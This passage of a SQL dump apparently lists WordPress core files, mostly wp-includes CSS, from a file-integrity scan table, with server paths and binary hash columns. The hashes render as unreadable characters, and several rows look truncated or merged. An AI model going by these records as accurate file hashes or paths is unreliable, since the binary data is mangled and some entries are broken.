(e5]i\ns','',0,'?'),('j䱋%]','wp-includes/class-wp-xmlrpc-server.php','/home/tummmyov/tummyrevolution.com/wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','98~U%H/K',')r΅5<Խ\\*Gw3>Gj82Ln','',0,'?'),('$C/9','wp-includes/class-wp.php','/home/tummmyov/tummyrevolution.com/wp-includes/class-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_yƂ ','9$;̛*\\X\'\n.8o\n++!','',0,'?'),('mTZ`xk','wp-includes/class.wp-scripts.php','/home/tummmyov/tummyrevolution.com/wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 #Kh+','ruڶbW87fG]k\0f5','',0,'?'),('9ψ[1d{@','wp-includes/class.wp-styles.php','/home/tummmyov/tummyrevolution.com/wp-includes/class.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x$Ϗ/','\rW|Kx}ZgOy-aϷ','',0,'?'),('=k[4 =','wp-includes/comment-template.php','/home/tummmyov/tummyrevolution.com/wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4W{H\\y?Q','@p]XeZ$)V3','',0,'?'),('S KK2iɈ','wp-includes/comment.php','/home/tummmyov/tummyrevolution.com/wp-includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']K_ V+N\'@Ɯv','ձV!#K6$5CqVK','',0,'?'),('_\\c9mLv1','wp-includes/compat.php','/home/tummmyov/tummyrevolution.com/wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wu&A','}T=x#ۍCO7\ryoX','',0,'?'),('-\"DʹD5a/','wp-includes/cron.php','/home/tummmyov/tummyrevolution.com/wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J]{C\rQA','Nye R hv!#xk','',0,'?'),('=֬H@-i','wp-includes/css/admin-bar-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#PD] A','4A2z\n@ /[h','',0,'?'),('{ڭd3TXy7;','wp-includes/css/admin-bar-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2/QT1','oNc2| RTRdh','',0,'?'),('Ȇp]4Lq','wp-includes/css/admin-bar.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','誼jo~H','V^oBD(JWodxY{36','',0,'?'),('I\"ptQ[Z6x','wp-includes/css/admin-bar.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s=l\\',')(pbHj\"Gs;-QFM y9.7','',0,'?'),('t8p̋z{jDp','wp-includes/css/buttons-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/buttons-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݐopζ=','*.&s@(Bj<@ɕ&z˯.','',0,'?'),('Ul1ȕDbmg','wp-includes/css/buttons-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j%\" ','х>725 N㢕:Iy1','',0,'?'),(';^𩸴8c','wp-includes/css/buttons.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gua$/','^F^3v M_HR!:6/\0','',0,'?'),('з&L۽¨VN','wp-includes/css/buttons.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĸxZzoV','TEDcߏˑεk=8c:aH','',0,'?'),('\0ߴ:HP','wp-includes/css/classic-themes.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/classic-themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{5gj\rp ','p8e@eS\0,}Chw\ra8\073k/','',0,'?'),('Tn;3PS6','wp-includes/css/classic-themes.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/classic-themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZЗe|LZ','Uؚ`\0jAm\rǩ2##','',0,'?'),('F\\C?Z','wp-includes/css/customize-preview-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','މګd3','~\'[z{:LĀN7A ','',0,'?'),('Ư0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E?nZ d-','Gi\rliU^nrm5Ώۻ\\l','',0,'?'),('gVHIw!','wp-includes/css/customize-preview.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`oӏٷ1>','>kdU=@R\r;','',0,'?'),('ylsU><','wp-includes/css/customize-preview.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bSbs\"','ߌIR\\Ĺez3QsCQ','',0,'?'),('pS`]T]D','wp-includes/css/dashicons.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J/nR~','qԡcql5/3$˝TGW','',0,'?'),('LyE{f','wp-includes/css/dashicons.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍kUо3','|389&ΚG\"#\0̠;eR','',0,'?'),('pKb\0!(','wp-includes/css/dist/block-directory/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q$q>{ ȰI','$ ^|,\"x$Uym]','',0,'?'),('2Zs+ z','wp-includes/css/dist/block-directory/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0s<@DZa',',\0Y!՘+E$Y0HF ','',0,'?'),('B\\u}L,','wp-includes/css/dist/block-directory/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j{+|j7','L?ǫNY+10dJh','',0,'?'),('S t J9G','wp-includes/css/dist/block-directory/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ta\'=Fh\"','wyekj>[NUY','03EpeV|෧ \\$','',0,'?'),('*0+j&{Ew','wp-includes/css/dist/block-editor/content.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(V^{k&f','Е:-n۹AkM`D?','',0,'?'),('*>F0p\ZeM{ɟ<','wp-includes/css/dist/block-editor/content.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h2@q#n','O7_~T:dq{Ǟa','',0,'?'),('X*^ϺR8','wp-includes/css/dist/block-editor/default-editor-styles-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/default-editor-styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dT\rލ]L','ȣ@ Ξo,om5M# k','',0,'?'),('Єj[\'P`y','wp-includes/css/dist/block-editor/default-editor-styles-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/default-editor-styles-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xP<{A\"W',')32D {#yM6I9: d`','',0,'?'),('\\R$GO΄y','wp-includes/css/dist/block-editor/default-editor-styles.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/default-editor-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dT\rލ]L','ȣ@ Ξo,om5M# k','',0,'?'),('@\08(<: t#1S','wp-includes/css/dist/block-editor/default-editor-styles.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/default-editor-styles.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xP<{A\"W',')32D {#yM6I9: d`','',0,'?'),('ډx`9LťM,L','wp-includes/css/dist/block-editor/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}$C2rLLL/','=P\\#C>eMۄd','',0,'?'),('i4ZlЃ @','wp-includes/css/dist/block-editor/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JO\Z<)','<.sFl$\0S9R ܵK:','',0,'?'),('psZZ#N7e','wp-includes/css/dist/block-editor/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݖ EP)\0>','\"ŊZ, 4Y|1SNt1U8`','',0,'?'),('RBpmZ;','wp-includes/css/dist/block-editor/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ɧFH\"','ku}XKP+*we JA=','',0,'?'),('B2j70/zLq','wp-includes/css/dist/block-library/classic-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>dc5?','?\"4AHCǓ_/','',0,'?'),('gz_Mvf~','wp-includes/css/dist/block-library/classic-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/classic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݮux2V8C','69S$B#n.0%8lF*$\"','',0,'?'),('[\0Y[cM{','wp-includes/css/dist/block-library/classic.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>dc5?','?\"4AHCǓ_/','',0,'?'),('3lrP_B','wp-includes/css/dist/block-library/classic.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/classic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݮux2V8C','69S$B#n.0%8lF*$\"','',0,'?'),('ӤǕLFZQ','wp-includes/css/dist/block-library/common-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pr,yWaRC','կ5\n\r=Uv~ JUw?','',0,'?'),('&~*mE+nX%;[O','wp-includes/css/dist/block-library/common-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԃ5Euu E!',',I \neBӊ.y','',0,'?'),('266# S[ h(\\','wp-includes/css/dist/block-library/common.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S:`8|Ob','vjA禎 w!q;\"38}','',0,'?'),('7%̬&','wp-includes/css/dist/block-library/common.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0jL@8e','~Mk\ZY ~UMBچE|Scy','',0,'?'),('K7b{ru &MXD','wp-includes/css/dist/block-library/editor-elements-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-elements-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c|$\0{o','$2iQf~\':Sr4:A>','',0,'?'),('V\nKOZ7!JO','wp-includes/css/dist/block-library/editor-elements-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-elements-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vHօ','',0,'?'),('[ӽ$qjg_5','wp-includes/css/dist/block-library/editor-elements.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/editor-elements.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vHօ/\n','wp-includes/css/dist/block-library/elements.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/elements.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0YpU',')m.~yw`@ycZB','',0,'?'),('\r׍•K{!','wp-includes/css/dist/block-library/elements.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/elements.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sHH㑡 ','/hLLʭShHJԺ4 \"?A@','',0,'?'),(' JHl\"GL','wp-includes/css/dist/block-library/reset-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/reset-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L害rcH;ˇ','==uX4\\y0$Zj856:','',0,'?'),('3_[#g`','wp-includes/css/dist/block-library/reset-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/reset-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z8`ةe_=o','N!ǴOv\ZsZT','',0,'?'),('2glbCdM`H','wp-includes/css/dist/block-library/reset.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/reset.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L害rcH;ˇ','==uX4\\y0$Zj856:','',0,'?'),('za>`}74','wp-includes/css/dist/block-library/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Y6qrAy1̼','45yTV|@q~#]','',0,'?'),('z6+PH\rtU','wp-includes/css/dist/block-library/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U=~Mo3㙽dey&','q%#>]G3h{l ','',0,'?'),('QF0t+','wp-includes/css/dist/block-library/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fnf#]՜','\\LMnHS;eI#&7','',0,'?'),('m֙7,} ov','wp-includes/css/dist/block-library/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mqV8Dĺ','dq:Z.\rw#1f K','',0,'?'),('Cas]n/','wp-includes/css/dist/block-library/theme-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')2ȝ:J-','|<c!FléZfWvc\r\"bB','',0,'?'),('Oxرc5(','wp-includes/css/dist/block-library/theme.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i_žnic&','˫Q4:Rwzgi\'.Lw76','',0,'?'),('m5 u1}','wp-includes/css/dist/block-library/theme.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$B \\}%ۙ','Oa&C?b=D\nͤ\r!)','',0,'?'),('qi֬yd+O\'','wp-includes/css/dist/commands/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/commands/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VWvM8EE','2g5r8;@JJ','',0,'?'),('UG&t_Tr','wp-includes/css/dist/commands/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/commands/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Npe@\ZeFd','$6D)>vV\0kNKK\nK*[$','',0,'?'),('A8t2K)zH7','wp-includes/css/dist/commands/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/commands/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`۰IÅ15S','|Ra˱rU13!]1}؁,lC','',0,'?'),('\ZyAa L{ר','wp-includes/css/dist/commands/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/commands/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=-4]o ','\Zo~3BG5\0 S9 ڐn笕B!','',0,'?'),(';ܒscF!','wp-includes/css/dist/components/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\"~S*`΢!e','%Zpmdc6J$OأQJ\"lma','',0,'?'),('V܂0\0U`5C>','wp-includes/css/dist/components/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=?#wZr&ͯ','jLXx&f֨i\00 ','',0,'?'),('j^SN-O ','wp-includes/css/dist/components/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&{ 0nnaD','\'EW@Il<-Mk4^:q\"M','',0,'?'),('M1/ n̖Q','wp-includes/css/dist/components/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>X{XPӰ','M@WK&DG','',0,'?'),('D#q{ťԇb‚','wp-includes/css/dist/customize-widgets/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/customize-widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3wV{5ڀt+.','Al#_oH}߄ĩ~pW','',0,'?'),('l14&yaW','wp-includes/css/dist/customize-widgets/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/customize-widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')PTS)R:&\'T','.La!?$x_;6OKHc','',0,'?'),('zWsW5ʈ )','wp-includes/css/dist/customize-widgets/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/customize-widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UO@Sd','!eSZ>B:)2@lNAuÅȆKl','',0,'?'),('|m1\0z^m{','wp-includes/css/dist/customize-widgets/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/customize-widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q8` ꓀','',0,'?'),('t}jlU)@u','wp-includes/css/dist/edit-site/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-site/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\nX|e}y','1`׀\n\Z&8?p /ޛ}*','',0,'?'),('!h\Zɨ$\"R','wp-includes/css/dist/edit-site/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-site/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|ѢߐO`=a','|@ɬ7uRGP_WRǹ','',0,'?'),('#nΐ ','wp-includes/css/dist/edit-site/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-site/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')`p\'\r <ԶXhB','T8PK$j9Jo+gg^','',0,'?'),('-w=S','wp-includes/css/dist/edit-widgets/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nKv֫!٬','/K31̲`J^\rl?(nf;c','',0,'?'),('z|LFD','wp-includes/css/dist/edit-widgets/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.pW! s[ rɤ','a8ߥb9A% ̂ei','',0,'?'),('<8;p xTG','wp-includes/css/dist/edit-widgets/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̆)6|>EQ','%6=P S>Ty!\"%if','',0,'?'),('xeju','wp-includes/css/dist/edit-widgets/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/edit-widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CXFvwODX\\','[μHDJfll\r','nh&_¥aUxB>v)=Ņ','',0,'?'),('cQiQv','wp-includes/css/dist/editor/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|nPBTiZg^v','$pW@X)8py6\\@b9Mp\'X','',0,'?'),('ZRr(&b:-','wp-includes/css/dist/format-library/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʍ=zbHKW0P','Y7-㈘[k9nV]kbOX','',0,'?'),('C/@lY2}','wp-includes/css/dist/format-library/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 嘲?IZ6','ͻ6isj E3IMG-,9','',0,'?'),('\n{X%N8Ÿw2?M4C','wp-includes/css/dist/format-library/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u~[B*R\Z','g4& 7Rܘ2!\0VZ[=','',0,'?'),('.z&.1y','wp-includes/css/dist/format-library/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5\'UXSr','{XWje95.Ocm#Aٓ\r {','',0,'?'),('3-f\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P.7X0*','_~L7j&i28c5.','',0,'?'),('r) el','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cū?lt:','<)RwFv1څgL4 ۙ','',0,'?'),('t(iltY/','wp-includes/css/dist/list-reusable-blocks/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/list-reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\"\\]hwޥ','_6@*^z4%KjYrj*GFAI%','',0,'?'),('\rx+Uڜ','wp-includes/css/dist/list-reusable-blocks/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&&ECwW','wM|s)DON1\rEJsz n','',0,'?'),('^0pkM','wp-includes/css/dist/nux/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','su (`y˯d',',s\nOyKt8a ^6Z ','',0,'?'),('{jɏ|n ^','C`VyLgZx\rcx','',0,'?'),('\"(b?\Zgsq','wp-includes/css/dist/reusable-blocks/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{RK؉u\'','S܅*/o7E#3\\el2/-&','',0,'?'),('Rs{p~gЁؑ','wp-includes/css/dist/reusable-blocks/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x֕IS tW',' wnMȣJ \r6kW\0\rY8','',0,'?'),('**W852~','wp-includes/css/dist/reusable-blocks/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{RK؉u\'','S܅*/o7E#3\\el2/-&','',0,'?'),('\"q K6A !','wp-includes/css/dist/reusable-blocks/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x֕IS tW',' wnMȣJ \r6kW\0\rY8','',0,'?'),('@CE\'O','wp-includes/css/dist/widgets/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\ZdHRC4w\0 0%','i(@6\'%:0p޽)u3aA5s','',0,'?'),('^N4ӝ,baD','wp-includes/css/dist/widgets/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ށ)-^)','YPe+d8 ḧ2k+w_|Peγ','',0,'?'),('tLH:P(','wp-includes/css/dist/widgets/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8SoN=Gwt','S_\Z1a5V\'m]vw^rkvx','',0,'?'),(' tdrlPj','wp-includes/css/dist/widgets/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/dist/widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qʻ Ubp{\'3\rt','{AA(2)\" )F~W_','',0,'?'),('poX0%','wp-includes/css/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G\'Ǩ@@{}','hԑM\\C9\Zi\n_ї,\nJ','',0,'?'),('ꍥ2jEbg؈Wx','wp-includes/css/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','icߔ v\'\nJD','ӼBie!2P','',0,'?'),('LsЇś\nc}>K','wp-includes/css/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4~.(S>0','B9E6/*qopt9ee@\'ܮ','',0,'?'),('_| TM^J','wp-includes/css/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' M/','@ tӵ,la5#))','',0,'?'),(' c̫)I\np,͑','wp-includes/css/jquery-ui-dialog-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!U,U','Y 40@>Wb5!4 